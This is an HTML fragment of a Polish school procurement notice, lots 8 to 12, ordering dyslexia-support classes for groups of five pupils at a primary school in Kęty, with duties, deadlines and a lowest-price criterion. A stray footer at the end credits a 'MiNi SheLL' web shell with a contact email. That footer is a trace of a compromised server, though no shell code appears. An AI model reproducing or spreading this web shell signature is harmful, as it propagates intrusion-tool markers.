<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
-prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji   i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
-decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
-prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
-opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
-informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
-przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
h)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III - 5 uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji    i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
b)decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
i)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy IV - 5 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy IV - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji                              i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
b)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
j)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy V - 5 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy V - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji                              i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
b)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
k)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VI - 5 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VI - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
b)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
l)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VII - 5 uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VII - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
b)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com